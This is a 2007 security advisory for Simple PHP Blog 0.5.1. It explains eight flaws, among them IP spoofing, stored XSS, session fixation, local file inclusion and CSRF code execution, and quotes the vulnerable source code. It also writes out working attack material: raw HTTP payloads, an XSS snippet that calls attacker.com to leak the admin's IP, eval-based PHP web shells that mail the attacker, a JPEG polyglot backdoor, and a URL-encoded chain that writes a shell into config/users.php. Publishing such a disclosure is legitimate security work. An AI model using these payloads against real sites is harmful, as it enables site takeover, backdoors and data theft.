|
Title: Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
Vendor: http://sourceforge.net/projects/sphpblog/
Advisory: http://acid-root.new.fr/?0:15
Author: DarkFig < gmdarkfig (at) gmail (dot) com >
Released on: 2007/10/21
Changelog: ----------
L M H T
Summary: Ip Spoofing [X] [_] [_] [X]
Cross Site Scripting [X] [_] [_] [X]
Session Fixation [X] [_] [_] [X]
mail() CRLF Injection [X] [_] [_] [_]
Local File Inclusion (+CSRF) [_] [X] [_] [X]
File Deletion (+CSRF) [_] [X] [_] [X]
File Upload Vulnerability [_] [_] [X] [X]
Code Execution (+CSRF) [_] [_] [X] [X]
Legend: L - Low risk M - Medium risk
H - High risk T - Tested
Risk level: Medium / High
CVE: ----------
I - IP SPOOFING
The file "scripts/sb_communicate.php" contains the following
code:
19| function getIP() {
20| if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) {
21| $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
22| }
23| else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
24| $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
25| }
26| else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) {
27| $ip = $_SERVER[ 'REMOTE_ADDR' ];
28| }
29| else if ( getenv( "HTTP_CLIENT_IP" ) ) {
30| $ip = getenv( "HTTP_CLIENT_IP" );
31| }
32| else if ( getenv( "HTTP_X_FORWARDED_FOR" ) ) {
33| $ip = getenv( "HTTP_X_FORWARDED_FOR" );
34| }
35| else if ( getenv( "REMOTE_ADDR") ) {
36| $ip = getenv( "REMOTE_ADDR" );
37| }
38| else {
39| $ip = "UNKNOWN";
40| }
41| return( $ip );
42| }
So, an attacker can spoof his IP, he just have to create
an HTTP packet, add a special header, and send it. The
HTTP packet will look's like this:
GET /index.php HTTP/1.1\r\n
Host: localhost\r\n
X-Forwarded-For: 127.0.0.1\r\n
Connection: keep-alive\r\n\r\n
Later, we'll see how to gain the administrator's session
id. Even if we got the good session id, there is a
protection that "normally" don't permit to be logged in.
Let's see a part of the file "scripts/sb_login.php":
28| // Check if user is logged in.
29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
| $_SESSION[ 'logged_in' ] == 'yes' ) {
|
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }
Thanks to the getIP() function, if we know the
administrator's IP (later we'll see how to get it easily),
we can bypass the third condition.
II - CROSS SITE SCRIPTING
When a guest add a comment, an HTTP packet is sent to
"comment_add_cgi.php". Before writing the comment into
a file, there is some conditions, the first condition is
that the IP sent with the POST method, must be the same
as the IP returned by the getIP() function. Let's see
the code:
88| if ($ok) {
89| // Verify that posted IP and actual IP matches.
90| if ( getIP() === $_POST['user_ip'] ) {
91| $ipMatches = true;
92| } else {
93| $ipMatches = false;
94| $ok = false;
95| $error_message = $lang_string[ 'error_no_match' ];
96| }
97| }
This is useless, I don't know what the author wanted to
do but this can be bypassed easily. After some conditions,
the write_comment() function is called:
219| $result = write_comment( $_POST[ 'y' ], $_POST[ 'm' ],
| $_POST[ 'entry' ],
220| $comment_name,
221| $comment_email,
222| $comment_url,
223| $comment_text,
224| $_POST[ 'user_ip' ],
225| $moderationFlag,
226| time() );
This function is situated in "scripts/sb_comments.php".
Let's see the data which will be stored in a file:
519| // Save the file
520| $save_data = array();
521| $save_data[ 'VERSION' ] = $sb_info[ 'version' ];
522| $save_data[ 'NAME' ] = clean_post_text( $comment_name );
523| $save_data[ 'DATE' ] = $comment_date;
524| $save_data[ 'CONTENT' ] = sb_parse_url( clean_post_text( $comment_text ) );
|
525| if ( $comment_email != '' ) {
526| $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
527| }
|
528| if ( $comment_url != '' ) {
529| $save_data[ 'URL' ] = clean_post_text( $comment_url );
530| }
|
531| $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8
532| $save_data[ 'MODERATIONFLAG' ] = $hold_flag;
533|
534| // Implode the array
535| $str = implode_with_keys( $save_data );
536|
537| // Save the file
538| $result = sb_write_file( $entryFile, $str );
The clean_post_text() function protect against XSS, it
also replace a string separator (by its html equivalent)
which is used when comment's data are extracted.
This function is in the file "scripts/sb_formatting.php":
13| function clean_post_text( $str ) {
14| // Cleans post text input.
15| //
16| // Strip out and replace pipes with colons. HTML-ize entities.
17| // Use charset from the language file to make sure we're only
18| // encoding stuff that needs to be encoded.
19| //
20| // This makes entries safe for saving to a file (since the data
21| // format is pipe delimited.)
22| global $lang_string;
23| $str = str_replace( '|', '|', $str );
24| $str = @htmlspecialchars( $str, ENT_QUOTES, $lang_string[ 'php_charset' ] );
25|
26| return ( $str );
27| }
The clean_post_text() function isn't applied to the
IP address which will be stored in the file. So this
can be exploited to conduct XSS attack. The attacker
will send an HTTP packet like this one:
POST /comment_add_cgi.php HTTP/1.1\r\n
Host: localhost\r\n
Client-IP: <script>alert(666)</script>\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 229\r\n\r\n
y=07&m=07&entry=entry070727-161718&comment_name=HereMyName
&comment_email=&comment_url=&user_ip=<script>alert(666)
</script>
&style_dropdown=--&comment_text=This+is+an+example+comment.
&comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\
r\n
The sender IP address can be only seen by a registered
user. So the code sent by the attacker will be executed
when a registered user will see the comments page.
III - SESSION FIXATION
In a session fixation attack, the attacker have to set
the victim's session id. In our case, the attacker fix
the user's session id, the victim which is logged in,
will get logged out when the cookie will be set, then
if the victim try to log in, the session id will be
registered on the server. Let's see a part of the
logged_in() function:
11| function logged_in ( $redirect_to_login, $redirect_to_setup ) {
12|
13| // Turn off URL SIDs.
14| ini_set('url_rewriter.tags','');
15| ini_set('session.use_trans_sid', false);
16|
17| // Init the session.
18| session_set_cookie_params(60*60*24*5);
19|
20| // Check if the user has a client-side cookie.
21| if ( isset( $_COOKIE[ 'sid' ] ) ) {
22| session_id($_COOKIE[ 'sid' ]);
23| }
24|
25| // Start the session.
26| session_start ();
27|
28| // Check if user is logged in.
29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
| $_SESSION[ 'logged_in' ] == 'yes' ) {
|
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }
After, the attacker, who knows the session id, just
have to use it to be logged in as the victim's account.
But in our case, he must also know the victim's IP.
I'll demonstrate how to get administrator rights even
if the victim has a protection against XSS (NoScript
Firefox plugin for example). First, the attacker will
fix the victim's session id by setting a cookie to
the victim. Then he'll also force the victim's web
browser to establish a connexion to a script that
will get the victim's IP. Take a look at this schema:
+----------------------------------------------------------+
| The attacker post a comment using the XSS vulnerability. |
| The code which will be executed on the client browser |
| will set the "sid" cookie, it will also force the |
| victim's web browser to send an HTTP packet to a script |
| that will mail the victim's IP to the attacker. |
+----------------------------------------------------------+
|
| +---------------------------------------------------+
+--> | <meta http-equiv=Set-Cookie content=sid=MD5HERE;> |
| <img src=http://attacker.com/getip_and_mail.php> |
+---------------------------------------------------+
|
+-------------------------------------------------+ |
| The victim, which is logged in, have to see the | <--+
| comments page. After saw it, the victim will be |
| logged out. |
+-------------------------------------------------+
|
| +------------------------------------------+
+--> | The victim try to log in. Now that she's |
| logged in, the session id set by the |
| attacker is registered on the server. |
+------------------------------------------+
|
+--------------------------------------------+ |
| Now the attacker just have to send an HTTP |<--+
| packet which contains the session id and a |
| special header with the victim's IP. |
| The attacker is logged in as the victim's |
| account. |
+--------------------------------------------+
As you can see, even if the victim is protected against
XSS, it's always possible to get adminitrator rights with
this type of attack, we juste use the "meta" and "img" tags.
IV - MAIL() CRLF INJECTION
User's variables are not checked before be used in the mail()
function. The file "comment_add_cgi.php" call the
write_comment() function with the following parameters:
214| $comment_name = sb_stripslashes($_POST['comment_name']);
215| $comment_email = sb_stripslashes($_POST['comment_email']);
216| $comment_url = sb_stripslashes($_POST['comment_url']);
217| $comment_text = sb_stripslashes($_POST['comment_text']);
218|
219| $result = write_comment($_POST[ 'y' ],$_POST[ 'm' ],
| $_POST['entry' ],
220| $comment_name,
221| $comment_email,
222| $comment_url,
223| $comment_text,
224| $_POST[ 'user_ip' ],
225| $moderationFlag,
226| time() );
Then the function clean_post_text() is applied to $comment_email.
But this function doesn't protect against CRLF Injection, this
will not replace the \r and \n chars. Take a look at the file
"sb_comments.php":
471| function write_comment($y,$m,$entry,$comment_name,$comment_email
|
525| if ( $comment_email != '' ) {
526| $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
527| }
|
584| // Send the Email
585| if ( array_key_exists( 'EMAIL', $save_data ) ) {
586| sb_mail( $save_data[ 'EMAIL' ], $blog_config[ 'blog_email' ],
| $subject, $body, false );
587| }
The goal of the sb_mail() function is to send mass emails.
As you can see belows, there is no protection against
$save_data[ 'EMAIL' ].
45| function sb_mail ($from, $to, $subject, $body, $text=true, $priority=3) {
|
69| $headers .= 'From: ' . $from . " \r\n";
70| $headers .= 'Reply-To: ' . $from . " \r\n";
71| $headers .= 'Return-Path: ' . $from . " \r\n";
|
76| ini_set('sendmail_from', $from);
77| for ( $j=0; $j < count($to_array); $j++ ) {
78| $result = mail( $to_array[$j], sb_stripslashes($subject),
| sb_stripslashes($body), $headers );
79| }
80| ini_restore('sendmail_from');
So an attacker can perform a CRLF injection attack into the mail()
function, it will probably be used by spammers.
V - LOCAL FILE INCLUSION (+CSRF)
There is an LFI vulnerability (admin rights needed)
in the file "languages_cgi.php":
76| if ( array_key_exists( 'store_data', $_GET ) ) {
77|
78| // Store all the data from language 2
79| require_once('languages/' . $_GET[ 'lang2' ] . '/strings.php');
This will require magic_quotes_gpc=Off. Because they use the
GET method, there's a CSRF vulnerability too. For each new
comments, a new text file is created. The structure of the file
like this:
VERSION|0.4.8
|NAME|<my_name>
|DATE|1188078694
|CONTENT|<my_comment>
|EMAIL|<my_email>
|IP-ADDRESS|<my_ip_or_xss>
|MODERATIONFLAG|H
Now imagine that an attacker use the XSS vulnerability to post
php code and html tags which will make the admin sent an HTTP
request to exploit the LFI vuln. The XSS code will look's like
this:
<!--- <?php
$handle = fopen('./themes/back.php', 'w+');
fwrite($handle, '<?php @eval($_SERVER[HTTP_SHELL]); ?>');
fclose($handle);
mail('hacker@you.com', 'hey', 'code executed');
exit();
/* --->
<img src=http://<site>/languages_cgi.php?store_data=1&lang2=
../content/07/07/entry070727-161718/comments/comment070825-235134.
txt%00>
<!--- */
?> --->
In order to exploit this, the attacker must know where the new
file will be created. Let's see the code:
471| function write_comment ( $y, $m, $entry, $comment_name,
| $comment_email, $comment_url, $comment_text, $user_ip,
| $hold_flag='', $comment_date=null ) {
|
478| $basedir = 'content/';
479| $dir = $basedir.$y.'/'.$m.'/'.$entry;
|
494| $dir .= '/comments';
|
506| $dir .= '/';
|
512| $stamp = date('ymd-His');
513| if ( $blog_config[ 'blog_enable_gzip_txt' ] ) {
514| $entryFile = $dir.'comment'.$stamp.'.txt.gz';
515| } else {
516| $entryFile = $dir.'comment'.$stamp.'.txt';
517| }
The variables $y, $m and $entry are sent with the HTTP request.
The filename is decided with the date() function. There is many
ways for know the content returned by $stamp:
- Ask the server by sending an HTTP request (the "Date" header).
- Bruteforce the path (Add several html tags).
- Divide our attack in two parts (filenames are displayed in the html source).
The attacker must also urlencode the content of his XSS, the
HTTP packet will finally look's like this:
POST /comment_add_cgi.php HTTP/1.1
Host: localhost
Connection: keep-alive
Cookie: PHPSESSID=<SID>
Client-IP: <HTML_AND_PHP_CONTENT>
Content-Type: application/x-www-form-urlencoded
Content-Length: <LEN>
y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker
&comment_email=my%40you.com&comment_url=&user_ip=
<HTML_AND_PHP_CONTENT_URLENCODED>
&style_dropdown=--&comment_text=Hello&comment_capcha
=128619&submit=%A0Post+Comment%A0
Now the attacker have to wait until the admin see his comment.
VI - FILE DELETION (+CSRF)
There is a CSRF vulnerability which can lead to file
deletion. Let's see the code of "trackback_delete_cgi.php":
22| if ( array_key_exists( 'trackback', $_GET ) ) {
23| $ok = delete_trackback( $_GET[ 'trackback' ] );
24| }
So if the variable "trackback" is set with the GET method,
the delete_trackback() function is called. The code of
this function is situated in "sb_trackback.php":
229| function delete_trackback ( $entryFile ) {
230| // Delete the old file
231| if ( file_exists( $entryFile ) ) {
232| $ok = sb_delete_file( $entryFile );
233| }
If the file exists, the function sb_delete_file() is called,
with the parameter $_GET['trackback']. The source code
of this function is situated in the file "sb_fileio.php":
171| function sb_delete_file ( $filename ) {
|
175| clearstatcache();
176| if ( file_exists( $filename ) ) {
177| $result = @unlink( $filename );
178| }
There is no verification before deleting the file. So we
can delete any files on the server. The HTTP packet sent
by the attacker will look's like this:
GET /trackback_delete_cgi.php?trackback=<FILE> HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n\r\n
Admin right's are needed to delete files, but because
it's also a CRLF vulnerability, we can use it in our XSS,
then so admin right's aren't needed for the attacker.
VII - FILE UPLOAD VULNERABILITY
When we're admin, we can upload emoticons.
Let'see the content of the function upload_emoticons()
which is situated in the file "emoticons.php":
36| function upload_emoticons() {
37| // Emoticon upload form results
38| $path = 'images/emoticons';
39| $uploaddir = $path;
40|
41| $ok = false;
42| if ( $_FILES[ 'user_emot' ][ 'error' ] == 0 ) {
43| if (!file_exists($uploaddir)) {
44| $oldumask = umask(0);
45| @mkdir($uploaddir, 0777 );
46| @umask($oldumask);
47| }
48|
49| $uploaddir .= '/';
50| $uploadfile = $uploaddir.
| preg_replace("/ /","_",$_FILES[ 'user_emot' ][ 'name' ]);
51|
52| if (@is_uploaded_file($_FILES['user_emot']['tmp_name']))
{
|
53| if (@getimagesize($_FILES['user_emot']['tmp_name']) == FALSE){
54| $ok = -1;
|
55| } else {
|
56| if (@move_uploaded_file($_FILES['user_emot']['tmp_name'], $uploadfile)){
57| chmod( $uploadfile, 0777 );
58| $ok = true;
59| }
As you can see, there is only one protection against file
upload vulnerability. The function getimagesize() will
return FALSE if the upload file isn't a valid image file.
But we can bypass this easily. Take a look at this:
C:\>edjpgcom img1x1.jpg
C:\>hexdump img1x1.jpg
ff d8 ff e0 00 10 4a 46 - 49 46 00 01 01 01 00 60 ......JF IF......
00 60 00 00 ff db 00 43 - 00 08 06 06 07 06 05 08 .......C ........
07 07 07 09 09 08 0a 0c - 14 0d 0c 0b 0b 0c 19 12 ........ ........
13 0f 14 1d 1a 1f 1e 1d - 1a 1c 1c 20 24 2e 27 20 ........ ........
22 2c 23 1c 1c 28 37 29 - 2c 30 31 34 34 34 1f 27 ......7. .01444..
39 3d 38 32 3c 2e 33 34 - 32 ff db 00 43 01 09 09 9.82..34 2...C...
09 0c 0b 0c 18 0d 0d 18 - 32 21 1c 21 32 32 32 32 ........ 2...2222
32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32 22222222 22222222
32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32 22222222 22222222
32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 ff fe 22222222 222222..
00 26 3c 3f 70 68 70 20 - 65 76 61 6c 28 24 5f 53 ....php. eval...S
45 52 56 45 52 5b 48 54 - 54 50 5f 53 48 45 4c 4c ERVER.HT TP.SHELL
5d 29 3b 20 3f 3e ff c0 - 00 11 08 00 01 00 01 03 ........ ........
01 22 00 02 11 01 03 11 - 01 ff c4 00 1f 00 00 01 ........ ........
05 01 01 01 01 01 01 00 - 00 00 00 00 00 00 00 01 ........ ........
02 03 04 05 06 07 08 09 - 0a 0b ff c4 00 b5 10 00 ........ ........
02 01 03 03 02 04 03 05 - 05 04 04 00 00 01 7d 01 ........ ........
02 03 00 04 11 05 12 21 - 31 41 06 13 51 61 07 22 ........ 1A..Qa..
71 14 32 81 91 a1 08 23 - 42 b1 c1 15 52 d1 f0 24 q.2..... B...R...
33 62 72 82 09 0a 16 17 - 18 19 1a 25 26 27 28 29 3br..... ........
2a 34 35 36 37 38 39 3a - 43 44 45 46 47 48 49 4a .456789. CDEFGHIJ
53 54 55 56 57 58 59 5a - 63 64 65 66 67 68 69 6a STUVWXYZ cdefghij
73 74 75 76 77 78 79 7a - 83 84 85 86 87 88 89 8a stuvwxyz ........
92 93 94 95 96 97 98 99 - 9a a2 a3 a4 a5 a6 a7 a8 ........ ........
a9 aa b2 b3 b4 b5 b6 b7 - b8 b9 ba c2 c3 c4 c5 c6 ........ ........
c7 c8 c9 ca d2 d3 d4 d5 - d6 d7 d8 d9 da e1 e2 e3 ........ ........
e4 e5 e6 e7 e8 e9 ea f1 - f2 f3 f4 f5 f6 f7 f8 f9 ........ ........
fa ff c4 00 1f 01 00 03 - 01 01 01 01 01 01 01 01 ........ ........
01 00 00 00 00 00 00 01 - 02 03 04 05 06 07 08 09 ........ ........
0a 0b ff c4 00 b5 11 00 - 02 01 02 04 04 03 04 07 ........ ........
05 04 04 00 01 02 77 00 - 01 02 03 11 04 05 21 31 ......w. .......1
06 12 41 51 07 61 71 13 - 22 32 81 08 14 42 91 a1 ..AQ.aq. .2...B..
b1 c1 09 23 33 52 f0 15 - 62 72 d1 0a 16 24 34 e1 ....3R.. br....4.
25 f1 17 18 19 1a 26 27 - 28 29 2a 35 36 37 38 39 ........ ...56789
3a 43 44 45 46 47 48 49 - 4a 53 54 55 56 57 58 59 .CDEFGHI JSTUVWXY
5a 63 64 65 66 67 68 69 - 6a 73 74 75 76 77 78 79 Zcdefghi jstuvwxy
7a 82 83 84 85 86 87 88 - 89 8a 92 93 94 95 96 97 z....... ........
98 99 9a a2 a3 a4 a5 a6 - a7 a8 a9 aa b2 b3 b4 b5 ........ ........
b6 b7 b8 b9 ba c2 c3 c4 - c5 c6 c7 c8 c9 ca d2 d3 ........ ........
d4 d5 d6 d7 d8 d9 da e2 - e3 e4 e5 e6 e7 e8 e9 ea ........ ........
f2 f3 f4 f5 f6 f7 f8 f9 - fa ff da 00 0c 03 01 00 ........ ........
02 11 03 11 00 3f 00 f7 - fa 28 a2 80 3f ff d9 d9 ........ ........
C:\>ren img1x1.jpg backdoor.php
The created file is a valid jpg image, so the check made
by the function getimagesize() will be bypassed. And so
the backdoor will be uploaded in "images/emoticons".
VIII - CODE EXECUTION (+CSRF)
There is a CSRF vulnerability which can lead to execute
PHP code, this is the critical point of this script.
Let's see the code of the file "manage_users.php":
61| if ( $_GET[ 'action' ] == "update" ) {
|
63| if ($_SESSION[ 'fulladmin' ] != 'yes' ) {
64| echo($lang_string['fulladminerror']);
65| } else {
66|
67| // First read and remove the offending line
68| $pfile = fopen("config/users.php","a+");
69| rewind($pfile);
|
70| while (!feof($pfile)) {
71| $line = fgets($pfile);
72| $tmp = explode('|', $line);
73|
74| if ( $_GET[ 'type' ] == "edit" ) {
75| if ( $tmp[1] != $_GET[ 'user' ] )
| { $newfile = $newfile . $line; }
76| } else {
77| $newfile = $newfile . $line;
78| }
79| }
80| fclose($pfile);
|
101| $blankfield = "";
102|
103| // Create the record structure
104| if ( $_GET[ 'type' ] == "edit" ) {
|
107| $password = $_GET[ 'oldpasshash' ];
108| if ( $password != $_POST[ 'sPassword' ] ) {
109| $password = crypt($_GET[ 'user' ],$_POST[ 'sPassword' ] );
110| }
111|
112| $array =
| array($_POST[ 'sFullname' ], $_GET[ 'user' ], $password,
| $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
| $modcomments, $deleteentries, $editany, $blankfield);
|
113| } else {
|
114| $array =
| array($_POST[ 'sFullname' ], $_POST[ 'sUsername' ],
| crypt( $_POST[ 'sUsername' ], $_POST[ 'sPassword' ] ),
| $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
| $modcomments, $deleteentries, $editany, $blankfield);
115| }
|
116| $str = implode('|', $array);
117| $newfile = $newfile . $str . "n";
|
120| $pfile = fopen("config/users.php","w");
121| fwrite($pfile, $newfile);
122| fclose($pfile);
123|
124| redirect_to_url("manage_users.php");
125| }
126| }
As you can see there is no protection against PHP chars
(like strip_tags()) before inserting user's data into
the php file. But the author of the script add a ".htaccess"
file in the "config" directory. Let's see the content of
this file:
1| IndexIgnore *
2|
3| <Files .htaccess>
4| order allow,deny
5| deny from all
6| </Files>
7|
8| <Files *.txt>
9| order allow,deny
10| deny from all
11| </Files>
So we can't list the content of the directory, and we
don't have access to .htaccess/.txt files. But we can
access to .php files ! This require admin rights...
but we can write PHP code with the GET method, that's
why there's also a CSRF vulnerability. In our example
we will take this php code (as you can see we don't
need magic_quote_gpc=Off):
1| <?php
2|
3| if(isset($_GET[mail]))
4| {
5| $mail = <<<MAIL
6| hacker@you.com
7| MAIL;
8|
9| $subject = <<<SUBJ
10| Hey !
11| SUBJ;
12|
13| $body = <<<BODY
14| Code executed
15| BODY;
16|
17| mail($mail,$subject,$body);
18| }
19| else eval($_SERVER[HTTP_SHELL]);
20|
21| ?>
So the attacker just have to post (using the XSS)
something like this:
<img src=http://<site>/manage_users.php?action=update
&type=edit&user=%3C%3Fphp%0D%0A%0D%0Aif%28is
set%28%24
_GET%5Bmail%5D%29%29%0D%0A%7B%0D%0A%24ma
il+%3D+%3C%3C
%3CMAIL%0D%0Ahacker%40you.
com%0D%0AMAIL%3B%0D%0A%0D%0
A%24subject+%3D+%3C%3C%3CSUBJ%0D%0AHey+%21%0
D%0ASUBJ%
3B%0D%0A%0D%0A%24body+%3D+%3C%3C%3CBODY%
0D%0ACode+exe
cuted%0D%0ABODY%3B%0D%0A%0D%0Amail%28%24mail
%2C%24sub
ject%2C%24body%29%3B%0D%0A%7D%0D%0Aelse+eval
%28%24_SE
RVER%5BHTTP_SHELL%5D%29%3B%0D%0A%0D%0A%3F%
3E>
<!--- Write php code --->
<img src=http://<site>/config/users.php?mail=1>
<!--- mail the attacker --->
<img src=http://<site>/trackback_delete_cgi.php?track
back=MY_COMMENT_FILENAME>
<!--- delete the comment --->
After, he have to wait until the admin see his comment.
Then the HTTP request will be sent to the script, and
so the PHP code will be written into "config/users.php".
IX - END
As you can see there's some pretty cool things here:
- [III] We bypass Noscript firefox plugin protection.
We don't use any <script> tags.
- [V] We use a "self inclusion" technique.
We use html and php commentary tags which are very
useful in our case.
I didn't contacted the author of the script, but if
he keeps himself informed of updates concerning his
script, he should correct these vulnerabilities as
quickly as possible.
//Greetz: ddx39, berga, wo, overlock[]
|
